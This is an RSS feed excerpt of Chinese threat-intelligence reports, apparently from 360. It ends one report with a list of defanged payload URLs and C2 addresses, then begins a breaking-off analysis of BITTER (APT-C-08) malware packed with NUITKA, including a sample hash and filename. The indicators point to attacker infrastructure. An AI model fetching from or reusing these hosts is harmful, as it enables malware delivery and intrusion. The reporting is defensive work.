target="_blank">https://raw.githubusercontent[.]com/shantez41/EDGTy/refs/heads/main/hawek.ini</a></span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;"><a href="https://www.dropbox[.]com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&amp;st=kn296823&amp;dl=1" target="_blank">https://www.dropbox[.]com/scl/fi/q59g50jxsw5jjviup83tl/help.ini?rlkey=mu99taspiwvvuyuoy1fpf2232&amp;st=kn296823&amp;dl=1</a></span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;"><a href="https://raw.githubusercontent[.]com/shantez441/EDGTy/refs/heads/main/qdke.ini" target="_blank">https://raw.githubusercontent[.]com/shantez441/EDGTy/refs/heads/main/qdke.ini</a></span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;"><a href="https://raw.githubusercontent[.]com/shantez441/EDGTy/refs/heads/main/fox.png" target="_blank">https://raw.githubusercontent[.]com/shantez441/EDGTy/refs/heads/main/fox.png</a></span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">112.216.9[.]171:3385</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">112.216.9[.]171:7707</span></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;"><font face="等线"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: bold;">参考链接：</span></span></font></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;text-align: left;" data-pm-slice="0 0 []"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">[1] </span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247504218&amp;idx=1&amp;sn=47c3680b0c07f8e130630073914a3992&amp;scene=21#wechat_redirect" textvalue="" linktype="text" data-linktype="2"><span textstyle="" style="font-size: 15px;font-weight: normal;">https://mp.weixin.qq.com/s/GzMoR8jKjelzuj5BPhpJYA</span></a></span></p><p style="text-indent: 0px;margin-bottom: 8px;margin-top: 8px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;">[2]</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: normal;"><a href="https://jp.security.ntt/insights_resources/tech_blog/darkplum-asyncrat/" target="_blank">https://jp.security.ntt/insights_resources/tech_blog/darkplum-asyncrat/</a></span></span></p><div data-role="outer" label="Powered by 135editor.com" style="" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="96036"><div style="margin:10px auto;"><div data-autoskip="1" style="font-size: 14px;text-align: justify;letter-spacing: 1.5px;line-height: 1.75em;color: #3e3e3e;"><p hm_fix="208:559"><span style="color: rgb(190, 25, 31);font-size: 15px;"><strong style="letter-spacing: 0.544px;caret-color: red;max-width: 100%;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="max-width: 100%;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">360</span></span></strong><strong style="letter-spacing: 0.544px;caret-color: red;max-width: 100%;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="max-width: 100%;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="margin: 0px;padding: 0px;text-align: justify;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;max-width: 100%;color: rgb(136, 136, 136);font-size: 15px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div><o:page></o:page></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=da82ab6b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508584%26idx%3D1%26sn%3D3983faed8f799809ecc23eb552e73548">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 13 May 2026 17:33:00 +0800</pubDate>
    </item>
    <item>
      <title>蔓灵花组织使用NUITKA打包的python样本进行投递</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508516&amp;idx=1&amp;sn=a869f67294b5777615ad597c3730105e</link>
      <description>近期360安全大脑监测到多起蔓灵花组织攻击事件，通过直接投递NUITKA打包的python样本，或投递chm文件加载NUITKA打包的python样本</description>
      <content:encoded><![CDATA[<p><span>360威胁情报中心</span> <span>2026-04-29 17:13</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=fae619e3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FEmmib7pWXrXIFcRVeEGqAcmkRqcoectUscfkIf0kVY92NWBV3Q550t0lEJ9adhXJ2MeoG0y0YG9RbSkWd2sGyyP50ib7wb6Dc0QtaVTAl22AQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>近期360安全大脑监测到多起蔓灵花组织攻击事件，通过直接投递NUITKA打包的python样本，或投递chm文件加载NUITKA打包的python样本</p>
  <div data-tools="135编辑器" data-id="102539" data-pm-slice="0 0 []"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="box-sizing: border-box;padding:1em 1em;"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid #be191f;box-sizing: border-box;"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding: 0px 0em 3px;color: #322828;margin-left: 12px;border-bottom: 1px solid #be191f;font-style: italic;box-sizing: border-box;"><span style="font-size: 18px;"><strong><span leaf="">APT-C-08</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding: 4px 0em 0px;color: #be191f;font-style: italic;box-sizing: border-box;"><span style="font-size: 18px;"><strong><span leaf=""><span textstyle="" style="font-style: italic;">蔓灵花</span></span></strong></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;color: #000000;margin-top: 20px;" data-mpa-action-id="mo81cwbw1re6" data-pm-slice="0 0 []"><p style="vertical-align: inherit;padding: 0px;clear: both;color: #333333;font-weight: normal;font-size: 17px;text-indent: 28px;line-height: 1.5em;margin-top: 8px;margin-bottom: 8px;display: block;font-family:等线;text-align:justify;"><span style="padding: 0px;color: #333333;text-align: justify;line-height: 18.4px;font-size: 17px;font-family:仿宋;"><span mpa-font-style="mo19ftkt1qsq" style="font-size: 17px;"><span mpa-font-style="mo2j9i8s24nq" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" mpa-font-style="mo81cwb81a95" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;" data-mpa-action-id="mo81ajzo1d3g" data-pm-slice="0 0 []">APT-C-08（蔓灵花）组织（亦称 BITTER）是长期活跃于南亚方向、具备较强网络攻击能力的境外 APT 组织，自 2013 年起持续开展高级持续性威胁攻击活动。该组织攻击活动覆盖南亚及周边区域，长期针对政府部门、军工、国防、高校及涉外相关机构实施定向网络入侵。其攻击体系成熟，具备完善的武器库与攻击链路，是当前对区域网络安全具有持续高威胁的境外 APT 组织之一。</span></span></span></span></p><p style="vertical-align: inherit;padding: 0px;clear: both;color: #333333;font-weight: normal;font-size: 17px;text-indent: 28px;line-height: 1.5em;margin-top: 8px;margin-bottom: 8px;display: block;font-family:等线;text-align:justify;"><span style="padding: 0px;color: #333333;text-align: justify;line-height: 18.4px;font-size: 17px;font-family:仿宋;"><span mpa-font-style="mo19ftkta5o" style="font-size: 17px;"><span mpa-font-style="mo2j9i8sw64" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span mpa-font-style="mo81cu741nva" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span mpa-font-style="mo81cwb81851" style="font-size: 17px;"><span leaf="">近期</span><span lang="EN-US"><span leaf="">360</span></span><span leaf="">安全大脑监测到多起蔓灵花组织攻击事件，通过直接投递</span><span lang="EN-US"><span leaf="">NUITKA</span></span><span leaf="">打包的</span><span lang="EN-US"><span leaf="">python</span></span><span leaf="">样本</span><span leaf="">，或投递</span><span lang="EN-US"><span leaf="">chm</span></span><span leaf="">文件加载</span><span lang="EN-US"><span leaf="">NUITKA</span></span><span leaf="">打包的</span><span lang="EN-US"><span leaf="">python</span></span><span leaf="">样本。用户点击后，样本会下载后续后门组件。</span></span></span></span></span></span></p></div></div></div></div></div><h1 style="margin: 16px 0px;text-indent: 0px;line-height: 1.6em;"><span mpa-font-style="mo19dgou1ffv" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-mpa-action-id="mo19lhfg1geo" data-pm-slice="0 0 []"><span style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span style="background-color: #be191f;color: #ffffff;font-weight: bold;font-size: 18px;" mpa-font-style="mo19lhf51c2h"><span leaf=""> 一、</span></span></span><span style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span style="background-color: #be191f;color: #ffffff;font-weight: bold;font-size: 18px;" mpa-font-style="mo19lhf56pf"><span leaf="">攻击活动分析 </span></span></span></span></h1><h2 style="margin: 16px 0px;text-indent: 0px;line-height: 1.6em;"><span mpa-font-style="mo19dgou1af6" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">1.</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">攻击流程分析</span></span></span></h2><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1u87">蔓灵花组织此类攻击的核心初始载荷为NUITKA打包的python样本，该文件功能简单，下载一个后门组件。该后门组件主要功能是执行cmd指令。攻击者通过远程执行cmd指令，从而进行以下操作：获取系统基本信息、后续后门组件下载、下载python脚本执行套件、下载窃密组件等。整个攻击流程如下图所示：</span><o:page></o:page></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.997179125528914" data-w="709" style="width: 553.74px;height: 552.21px;" src="https://wechat2rss.xlab.app/img-proxy/?k=b3f18bc8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKbIT3XdhFJmlGDlk9WkF0Y6tNnApphXMAQe0hE1SELsuPcicRIz5N96BrvFC66ftPPn9SzRFTw16kW5N6Vl7oYeV72via77Gxmk%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><h2 style="margin: 16px 0px;text-indent: 0px;line-height: 1.6em;"><span mpa-font-style="mo19dgou1jps"><span leaf="" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">2.</span></span><span leaf="" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">恶意载荷分析</span></span></span></h2><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1zy0">捕获的恶意样本如下所示：</span></p><div style="margin-left: 0;margin-right: 0;"><div><div><div><div><div><div><div><p><table style="width:481px;"><tbody><tr><td data-colwidth="127"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">MD5</span></span></span></p></td><td data-colwidth="354"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">397591dd098f9240684f9a999e38eb12</span></span></span></p></td></tr><tr><td data-colwidth="127"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">文件名称</span></span></span></p></td><td data-colwidth="354"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">delivery_of_the_aviation_technical_equipment.exe</span></span></span></p></td></tr><tr><td data-colwidth="127"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">文件大小</span></span></span></p></td><td data-colwidth="354"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">5.72 MB (5999104 bytes)</span></span></span></p></td></tr><tr><td data-colwidth="127"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">文件类型</span></span></span></p></td><td data-colwidth="354"><p data-mpa-action-id="mo2j9wnbyeu"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">exe</span></span></span></p></td></tr></tbody></table></p></div></div></div><p style="text-indent: 2em;"><span leaf="">1）样本为NUITKA打包的文件。</span></p></div></div></div></div><o:page></o:page></div><p data-remoteid="" data-asynid="" src="http://mmbiz.qpic.cn/mmbiz_png/Emmib7pWXrXIujJW62ssCmtI0pWorexTPF56E7D5kjm6vy8M2MWnHsJc4NUvbLBt0u6ziaujQzJvUXe3VgPc5kjiaCaYMdDdiaBFEfH1NslIm80/0?wx_fmt=png" data-src="" align="" alt="" border="" class="rich_pages wxw-img" data-ratio="0.2836734693877551" data-s="" data-type="" data-w="490" aria-label="" aria-braillelabel="" aria-description="" height="" hspace="" ismap="" opacity="" sizes="" title="" type="" usemap="" vspace="" width="" data-width="" data-height="" data-croporisrc="" data-cropx1="" data-cropx2="" data-cropy1="" data-cropy2="" data-cropselx1="" data-cropselx2="" data-cropsely1="" data-cropsely2="" data-backw="" data-backh="" data-copyright="" data-oversubscription-url="" data-before-oversubscription-url="" data-galleryid="" data-gallerysupplier="" data-cardimg="" data-fileid="" data-imgfileid="" data-positionback="" data-imgqrcoded="" data-imgid="" data-upload="" data-fromlib="" data-aiimageid="" data-aiimagesource="" data-cacheurl="" data-aistatus="" data-retry="" style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2836734693877551" data-w="490" style="width: 489.95px;height: 138.98px;" src="https://wechat2rss.xlab.app/img-proxy/?k=4b6a1101&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIujJW62ssCmtI0pWorexTPF56E7D5kjm6vy8M2MWnHsJc4NUvbLBt0u6ziaujQzJvUXe3VgPc5kjiaCaYMdDdiaBFEfH1NslIm80%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgoudpm" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">打包的python版本为python312。NUITKA特征是会将组件释放到%TEMP%\onefile_XXXX_XXXXXXX文件夹中。</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6026058631921825" data-w="614" style="width: 553.74px;height: 333.67px;" src="https://wechat2rss.xlab.app/img-proxy/?k=467a3267&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLteia7Opkc2ET2vwa0PNSny5CWc9iaTicHlfWibAcYFNFMv9Z54lBXjmxic1zicf9S1kYknoQsicZ8sutiaIUG05EswK2Ugl9rooNuOuY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgou20jh" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">3）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">该样本核心功能是连接C2，获取C2命令执行。NUITKA打包python的逻辑，是将py脚本中每一行代码，都使用C语言进行实现。以这行代码为例“socket.socket(socket.AF_INET, socket.SOCK_STREAM)”（这也是relish_for_ketty的核心代码）：</span></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgousk2">首先是从模块列表中获取到socket的模块。</span><o:page></o:page></p><p 